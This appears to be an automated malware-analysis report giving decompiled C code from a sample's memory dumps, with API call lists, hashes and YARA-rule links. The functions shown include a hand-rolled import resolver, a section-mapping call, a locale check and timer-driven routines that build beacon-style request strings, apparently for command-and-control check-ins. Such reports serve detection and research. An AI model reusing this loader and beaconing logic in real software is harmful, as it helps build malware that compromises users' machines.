Opcode Fuzzy Hash: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
Instruction Fuzzy Hash: 89211F71E0020DAFDB01CFA9C8849DFFBB9EF48354F104869E505F7610D730AA448BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6C501566, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6C501566(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x6c50156a
0x6c50157b
0x6c501583
0x6c501585
0x6c501598
0x6c501598
0x6c5015a2

APIs

GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,6C501C5E,?,6C501810,?,00000000,00000000,?,?,?,6C501810), ref: 6C50157B
GetSystemDefaultUILanguage.KERNEL32(?,?,6C501C5E,?,6C501810,?,00000000,00000000,?,?,?,6C501810), ref: 6C501585
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6C501C5E,?,6C501810,?,00000000,00000000,?,?,?,6C501810), ref: 6C501598

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: d56822503f85eaa0710f49b197ff7e2562f70cc349a5d699beb7d6c144217cb0
Instruction ID: a0591ab78e7052fee4d346b482e5a6e1b601d22d8bc20f6981da6c2e2f6e2e17
Opcode Fuzzy Hash: d56822503f85eaa0710f49b197ff7e2562f70cc349a5d699beb7d6c144217cb0
Instruction Fuzzy Hash: 8CE04874740204F6E710D7919C06FBE727C970070EF500048F701D60C0D774DE049B2A

Uniqueness

Uniqueness Score: -1.00%

Function 6C501F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6C501F31(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6c5041cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6c501f31
0x6c501f3a
0x6c501f3f
0x6c501f45
0x6c501f4e
0x6c501f54
0x6c501f56
0x6c501f59
0x6c501f5e
0x6c501f65
0x6c501f65
0x6c501f69
0x6c501f71
0x6c501f74
0x00000000
0x00000000
0x6c501f7a
0x6c501f84
0x6c501f86
0x6c501f89
0x6c501f8c
0x6c501f90
0x6c501f98
0x6c501f9a
0x6c501f9d
0x6c502005
0x6c502005
0x6c502009
0x00000000
0x00000000
0x6c501fa2
0x6c501fa8
0x6c501faa
0x6c501fbd
0x6c501fc0
0x6c501fc0
0x6c501fc0
0x6c501fc4
0x6c501fac
0x6c501fac
0x6c501fb4
0x6c501fb6
0x00000000
0x00000000
0x00000000
0x00000000
0x6c501fb6
0x6c501fa4
0x6c501fa4
0x6c501fb8
0x6c501fb8
0x6c501fb8
0x6c501fc7
0x6c501fca
0x6c501fcc
0x6c501fd3
0x6c501fce
0x6c501fce
0x6c501fce
0x6c501fdb
0x6c501fe1
0x6c501fe3
0x6c502013
0x6c501fe5
0x6c501fe5
0x6c501fe8
0x6c501fea
0x6c501ff2
0x6c501ff2
0x6c501ff7
0x6c501ff9
0x6c502000
0x6c502002
0x6c502002
0x6c502002
0x00000000
0x6c502002
0x00000000
0x6c501fe3
0x6c501f92
0x6c501f94
0x6c501f96
0x00000000
0x00000000
0x6c501f96
0x6c502016
0x6c502016
0x6c50201d
0x6c502022
0x00000000
0x00000000
0x6c502028
0x6c502033
0x00000000
0x6c502033
0x6c50202a
0x6c50202a
0x6c502030
0x00000000
0x6c502030
0x6c501f5e
0x6c502034
0x6c502039

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6C501F69
GetProcAddress.KERNEL32(?,00000000), ref: 6C501FDB

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: b9ee672b3058f798a473ba3f64480fbdcb322578ad79d1e82d9a90a31176a8d4
Instruction ID: bc5da30318488317f84c52bf62caf45ea35662ab1b505e46f36b61e7a4d9097d
Opcode Fuzzy Hash: b9ee672b3058f798a473ba3f64480fbdcb322578ad79d1e82d9a90a31176a8d4
Instruction Fuzzy Hash: CA313771B0120ADFDB14CF59CC94AAEB7F8BF45358F24456AD811E7640E770DA40CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6C501B89, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6C501B89(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6c501b9b
0x6c501ba1
0x6c501baf
0x6c501bb6
0x6c501bbb
0x6c501bc1
0x00000000
0x6c501bc2
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6C501943,00000002,00000000,?,?,00000000,?,?,6C501943,00000000), ref: 6C501BB6

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: e8c97859092bb10563eb2b7ffa8dc5bc960213d7e5480980f87b4110025dcee9
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: E1F012B5A0020CFFEB119FA5CC85C9FBBFDEB44354B104979B552E10A0E6309E089B61

Uniqueness

Uniqueness Score: -1.00%

Function 00506DB7, Relevance: 33.3, APIs: 22, Instructions: 263
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00506DB7(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t102;
				void* _t107;
				intOrPtr _t112;
				signed int _t116;
				char** _t118;
				int _t121;
				signed int _t123;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr _t133;
				intOrPtr _t136;
				int _t139;
				intOrPtr _t140;
				int _t143;
				void* _t144;
				void* _t145;
				void* _t155;
				int _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				intOrPtr _t162;
				void* _t164;
				long _t168;
				intOrPtr* _t169;
				intOrPtr* _t172;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t181;

				_t155 = __edx;
				_t145 = __ecx;
				_t63 = __eax;
				_t144 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x50a018; // 0x5ffc1f8b
				asm("bswap eax");
				_t65 =  *0x50a014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0x50a010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0x50a00c; // 0x67522d90
				asm("bswap eax");
				_t68 =  *0x50a2d0; // 0x2add5a8
				_t3 = _t68 + 0x50b622; // 0x74666f73
				_t158 = wsprintfA(_t144, _t3, 3, 0x3d14c, _t67, _t66, _t65, _t64,  *0x50a02c,  *0x50a004, _t63);
				_t71 = E0050271A();
				_t72 =  *0x50a2d0; // 0x2add5a8
				_t4 = _t72 + 0x50b662; // 0x74707526
				_t75 = wsprintfA(_t158 + _t144, _t4, _t71);
				_t175 = _t173 + 0x38;
				_t159 = _t158 + _t75;
				if(_a8 != 0) {
					_t140 =  *0x50a2d0; // 0x2add5a8
					_t8 = _t140 + 0x50b66d; // 0x732526
					_t143 = wsprintfA(_t159 + _t144, _t8, _a8);
					_t175 = _t175 + 0xc;
					_t159 = _t159 + _t143;
				}
				_t76 = E00502956(_t145);
				_t77 =  *0x50a2d0; // 0x2add5a8
				_t10 = _t77 + 0x50b38a; // 0x6d697426
				_t160 = _t159 + wsprintfA(_t159 + _t144, _t10, _t76, _t155);
				_t81 =  *0x50a2d0; // 0x2add5a8
				_t12 = _t81 + 0x50b7b4; // 0x2fe8d5c
				_t181 = _a4 - _t12;
				_t14 = _t81 + 0x50b33b; // 0x74636126
				_t157 = 0 | _t181 == 0x00000000;
				_t161 = _t160 + wsprintfA(_t160 + _t144, _t14, _t181 == 0);
				_t85 =  *0x50a318; // 0x2fe95e0
				_t176 = _t175 + 0x1c;
				if(_t85 != 0) {
					_t136 =  *0x50a2d0; // 0x2add5a8
					_t18 = _t136 + 0x50b8ea; // 0x3d736f26
					_t139 = wsprintfA(_t161 + _t144, _t18, _t85);
					_t176 = _t176 + 0xc;
					_t161 = _t161 + _t139;
				}
				_t86 =  *0x50a328; // 0x2fe95b0
				if(_t86 != 0) {
					_t133 =  *0x50a2d0; // 0x2add5a8
					_t20 = _t133 + 0x50b685; // 0x73797326
					wsprintfA(_t161 + _t144, _t20, _t86);
					_t176 = _t176 + 0xc;
				}
				_t162 =  *0x50a37c; // 0x2fe9630
				_t88 = E00505741(0x50a00a, _t162 + 4);
				_t168 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					RtlFreeHeap( *0x50a290, _t168, _t144); // executed
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x50a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x50a290, _t168, _v12);
						goto L28;
					}
					E00501A51(GetTickCount());
					_t95 =  *0x50a37c; // 0x2fe9630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x50a37c; // 0x2fe9630
					__imp__(_t99 + 0x40);
					_t101 =  *0x50a37c; // 0x2fe9630
					_t102 = E00505AE3(1, _t157, _t144,  *_t101); // executed
					_t164 = _t102;
					_v20 = _t164;
					asm("lock xadd [eax], ecx");
					if(_t164 == 0) {
						L26:
						HeapFree( *0x50a290, _t168, _a8);
						goto L27;
					}
					StrTrimA(_t164, 0x5092cc);
					_push(_t164);
					_t107 = E00502829();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x50a290, _t168, _t164);
						goto L26;
					}
					 *_t164 = 0;
					__imp__(_a8, _v12);
					_t169 = __imp__;
					 *_t169(_a8, _v8);
					 *_t169(_a8, _t164);
					_t112 = E005033FA(0, _a8);
					_a4 = _t112;
					if(_t112 == 0) {
						_a20 = 8;
						L23:
						E00502813();
						L24:
						HeapFree( *0x50a290, 0, _v8);
						_t168 = 0;
						goto L25;
					}
					_t116 = E00505C63(_t144, 0xffffffffffffffff, _t164,  &_v16); // executed
					_a20 = _t116;
					if(_t116 == 0) {
						_t172 = _v16;
						_t123 = E00501671(_t172, _a4, _a12, _a16); // executed
						_a20 = _t123;
						_t124 =  *((intOrPtr*)(_t172 + 8));
						 *((intOrPtr*)( *_t124 + 0x80))(_t124);
						_t126 =  *((intOrPtr*)(_t172 + 8));
						 *((intOrPtr*)( *_t126 + 8))(_t126);
						_t128 =  *((intOrPtr*)(_t172 + 4));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *_t172;
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						E00502A03(_t172);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t118 = _a12;
							if(_t118 != 0) {
								_t165 =  *_t118;
								_t170 =  *_a16;
								wcstombs( *_t118,  *_t118,  *_a16);
								_t121 = E00506459(_t165, _t165, _t170 >> 1);
								_t164 = _v20;
								 *_a16 = _t121;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E00502A03(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x00506db7
0x00506db7
0x00506db7
0x00506dc0
0x00506dc5
0x00506dcc
0x00506dce
0x00506dce
0x00506ddb
0x00506de6
0x00506de9
0x00506df4
0x00506df7
0x00506dfc
0x00506dff
0x00506e04
0x00506e07
0x00506e13
0x00506e20
0x00506e22
0x00506e28
0x00506e2d
0x00506e38
0x00506e3a
0x00506e3d
0x00506e43
0x00506e45
0x00506e4d
0x00506e58
0x00506e5a
0x00506e5d
0x00506e5d
0x00506e5f
0x00506e66
0x00506e6b
0x00506e78
0x00506e7a
0x00506e7f
0x00506e87
0x00506e8a
0x00506e90
0x00506e9b
0x00506e9d
0x00506ea2
0x00506ea7
0x00506eaa
0x00506eaf
0x00506eba
0x00506ebc
0x00506ebf
0x00506ebf
0x00506ec1
0x00506ec8
0x00506ecb
0x00506ed0
0x00506eda
0x00506edc
0x00506edc
0x00506edf
0x00506eed
0x00506ef2
0x00506ef6
0x00506ef9
0x005070c5
0x005070cd
0x005070da
0x00506eff
0x00506f0b
0x00506f13
0x00506f16
0x005070b5
0x005070bf
0x00000000
0x005070bf
0x00506f22
0x00506f27
0x00506f30
0x00506f41
0x00506f45
0x00506f4e
0x00506f54
0x00506f5c
0x00506f61
0x00506f68
0x00506f71
0x00506f77
0x005070a5
0x005070af
0x00000000
0x005070af
0x00506f83
0x00506f89
0x00506f8a
0x00506f91
0x00506f94
0x00507097
0x0050709f
0x00000000
0x0050709f
0x00506f9d
0x00506fa3
0x00506fac
0x00506fb5
0x00506fbb
0x00506fc2
0x00506fc9
0x00506fcc
0x005070dd
0x0050707f
0x0050707f
0x00507084
0x0050708f
0x00507095
0x00000000
0x00507095
0x00506fd6
0x00506fdd
0x00506fe0
0x00506fe5
0x00506ff0
0x00506ff5
0x00506ff8
0x00506ffe
0x00507004
0x0050700a
0x0050700d
0x00507013
0x00507016
0x0050701b
0x0050701f
0x0050701f
0x0050702b
0x00507037
0x0050703b
0x0050703d
0x00507042
0x00507044
0x00507049
0x0050704e
0x0050705b
0x00507063
0x00507066
0x00507066
0x00507042
0x00000000
0x0050702d
0x00507031
0x00507068
0x0050706b
0x00507074
0x00000000
0x00000000
0x00000000
0x00000000
0x00507074
0x00507033
0x00000000
0x00507033
0x0050702b

APIs

GetTickCount.KERNEL32 ref: 00506DCE
wsprintfA.USER32 ref: 00506E1B
wsprintfA.USER32 ref: 00506E38
wsprintfA.USER32 ref: 00506E58
wsprintfA.USER32 ref: 00506E76
wsprintfA.USER32 ref: 00506E99
wsprintfA.USER32 ref: 00506EBA
wsprintfA.USER32 ref: 00506EDA
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00506F0B
GetTickCount.KERNEL32 ref: 00506F1C
RtlEnterCriticalSection.NTDLL(02FE95F0), ref: 00506F30
RtlLeaveCriticalSection.NTDLL(02FE95F0), ref: 00506F4E

Part of subcall function 00505AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00506301,00000000,02FE9630), ref: 00505B0E
Part of subcall function 00505AE3: lstrlen.KERNEL32(00000000,?,00000000,00506301,00000000,02FE9630), ref: 00505B16
Part of subcall function 00505AE3: strcpy.NTDLL ref: 00505B2D
Part of subcall function 00505AE3: lstrcat.KERNEL32(00000000,00000000), ref: 00505B38
Part of subcall function 00505AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00506301,?,00000000,00506301,00000000,02FE9630), ref: 00505B55

StrTrimA.SHLWAPI(00000000,005092CC,?,02FE9630), ref: 00506F83

Part of subcall function 00502829: lstrlen.KERNEL32(02FE887A,00000000,00000000,00000000,00506328,00000000), ref: 00502839
Part of subcall function 00502829: lstrlen.KERNEL32(?), ref: 00502841
Part of subcall function 00502829: lstrcpy.KERNEL32(00000000,02FE887A), ref: 00502855
Part of subcall function 00502829: lstrcat.KERNEL32(00000000,?), ref: 00502860

lstrcpy.KERNEL32(00000000,?), ref: 00506FA3
lstrcat.KERNEL32(00000000,?), ref: 00506FB5
lstrcat.KERNEL32(00000000,00000000), ref: 00506FBB

Part of subcall function 005033FA: lstrlen.KERNEL32(?,0050A380,73BB7FC0,00000000,00502788,?,?,?,?,?,00503EAC,?), ref: 00503403
Part of subcall function 005033FA: mbstowcs.NTDLL ref: 0050342A
Part of subcall function 005033FA: memset.NTDLL ref: 0050343C

wcstombs.NTDLL ref: 0050704E

Part of subcall function 00501671: SysAllocString.OLEAUT32(00000000), ref: 005016B2
Part of subcall function 00501671: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00501734
Part of subcall function 00501671: StrStrIW.SHLWAPI(00000000,006E0069), ref: 00501773

Part of subcall function 00502A03: RtlFreeHeap.NTDLL(00000000,00000000,00504072,00000000,?,?,00000000,?,?,?,?,?,?,005044AE,00000000), ref: 00502A0F

HeapFree.KERNEL32(00000000,?,00000000), ref: 0050708F
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0050709F
HeapFree.KERNEL32(00000000,00000000,?,02FE9630), ref: 005070AF
HeapFree.KERNEL32(00000000,?), ref: 005070BF
RtlFreeHeap.NTDLL(00000000,?), ref: 005070CD

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 2871901346-0
Opcode ID: cf828ede7d7389b8babcd102889184bbe3449802f0b0975716541389032a6605
Instruction ID: b32a30e07c44780aa2258c34bedfdb702232d0f9b3a2a76d8ba0b93c599ba78c
Opcode Fuzzy Hash: cf828ede7d7389b8babcd102889184bbe3449802f0b0975716541389032a6605
Instruction Fuzzy Hash: C7A1597590020AAFDB11DF68DC9CEAE3BA8FF58350F144525F809C72A1D731A958EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00501B47, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00501B47(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x50a298);
					_v20 = 0;
					_v16 = 0;
					L00507F56();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x50a2c4; // 0x2a4
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x50a2a4 = 5;
						} else {
							_t69 = E00504A3C(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x50a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E0050243C( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00507289(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x50a29c);
							goto L21;
						} else {
							__eflags =  *0x50a2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E00502813();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x50a2a0);
								L21:
								L00507F56();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x50a290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00501b47
0x00501b59
0x00501b5c
0x00501b68
0x00501b70
0x00501b73
0x00501cd9
0x00501b79
0x00501b79
0x00501b7b
0x00501b80
0x00501b81
0x00501b87
0x00501b8a
0x00501b8d
0x00501b9b
0x00501ba6
0x00501ba9
0x00501bab
0x00501bb8
0x00501bc2
0x00501bc6
0x00501bc9
0x00501bce
0x00501bd9
0x00501bd9
0x00501bd0
0x00501bd0
0x00501bd7
0x00000000
0x00000000
0x00501bd7
0x00501be3
0x00000000
0x00501be6
0x00501bea
0x00501bf5
0x00501bf5
0x00501bfc
0x00501c01
0x00501c08
0x00501c11
0x00501c17
0x00501c1a
0x00501c21
0x00501c24
0x00000000
0x00000000
0x00501c26
0x00501c29
0x00501c2c
0x00501c2f
0x00000000
0x00501c31
0x00501c40
0x00501c40
0x00000000
0x00501c6e
0x00501c6e
0x00501c73
0x00501c92
0x00501c94
0x00501c99
0x00501c9a
0x00000000
0x00501c75
0x00501c75
0x00501c7b
0x00000000
0x00501c7d
0x00501c7d
0x00501c82
0x00501c84
0x00501c89
0x00501c8a
0x00501ca0
0x00501ca0
0x00501ca8
0x00501cb3
0x00501cb6
0x00501cc1
0x00501cc3
0x00501cc5
0x00501cc8
0x00000000
0x00501cce
0x00000000
0x00501cce
0x00501cc8
0x00501c7b
0x00000000
0x00501c73
0x00501c43
0x00501c45
0x00501c48
0x00501c49
0x00501c49
0x00501c4d
0x00501c57
0x00501c57
0x00501c5d
0x00501c60
0x00501c60
0x00501c66
0x00501c66
0x00501ce3
0x00000000

APIs

memset.NTDLL ref: 00501B5C
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00501B68
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00501B8D
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00501BA9
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00501BC2
HeapFree.KERNEL32(00000000,00000000), ref: 00501C57
CloseHandle.KERNEL32(?), ref: 00501C66
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00501CA0
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00502F7D), ref: 00501CB6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00501CC1

Part of subcall function 00504A3C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02FE9338,00000000,?,73BCF710,00000000,73BCF730), ref: 00504A8B
Part of subcall function 00504A3C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02FE9370,?,00000000,30314549,00000014,004F0053,02FE932C), ref: 00504B28
Part of subcall function 00504A3C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00501BD5), ref: 00504B3A

GetLastError.KERNEL32 ref: 00501CD3

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
